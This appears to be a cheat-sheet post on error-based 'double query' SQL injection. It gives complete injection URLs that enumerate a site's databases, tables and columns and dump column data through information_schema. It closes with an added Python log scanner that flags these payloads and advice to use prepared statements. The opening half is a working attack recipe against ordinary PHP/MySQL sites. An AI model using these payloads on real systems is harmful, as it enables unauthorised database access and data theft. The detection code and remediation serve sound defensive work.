Double Query SQL Injection

Double Query SQL Injection Code



Finding Out the Database:



www.example.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Finding Out the Tables:

whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Replace HEX in 0xHEX with the hex code of the database name.
** Increase the first LIMIT to show all tables.

Finding Out the Columns:

www.example.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xHEXDATABASE AND table_name=0xHEXTABLENAME LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Replace HEXDATABASE in 0xHEXDATABASE and HEXTABLENAME in 0xHEXTABLENAME with the corresponding hex codes.

** Increase the first LIMIT to get all column names.

Now use the following code to dump all column data:

www.example.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from database.table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
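
Seen from the logging side, every request above carries the same shape in one parameter: count(*), floor(rand(0)*2) and group by, usually alongside information_schema. The following Python check flags that shape in web access logs; it is an added example, not part of the original post, and the log format, sample lines and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Tokens that together form the duplicate-key ("double query") shape used above.
SIGNATURE = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\("),
    "count": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"\bgroup\s+by\b"),
}
METADATA = re.compile(r"\binformation_schema\s*\.")  # schema enumeration
LOG_RX = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(target):
    """Decode up to two URL-encoding layers, drop SQL comments, lowercase, squeeze spaces."""
    text = target
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text.lower())

def classify(target):
    """Return 'double-query', 'suspicious' or 'clean' for one request target."""
    text = normalize(target)
    hits = [name for name, rx in SIGNATURE.items() if rx.search(text)]
    if len(hits) == len(SIGNATURE):
        return "double-query"
    if hits or METADATA.search(text):
        return "suspicious"
    return "clean"

def scan(log_lines):
    """Return (client_ip, verdict) for each log line that is not clean."""
    found = []
    for m in filter(None, map(LOG_RX.match, log_lines)):
        verdict = classify(m.group(2))
        if verdict != "clean":
            found.append((m.group(1), verdict))
    return found

# Constructed sample access-log lines (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1%20AND(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 0',
    '203.0.113.4 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=1+union+select+table_name+from+information_schema.tables HTTP/1.1" 200 90',
]
print(scan(SAMPLE_LOG))
```

A hit means the parameter reaches a SQL statement unescaped or is being probed for that; the durable fix is to bind id as a typed parameter in a prepared statement and to stop returning database error text to the client.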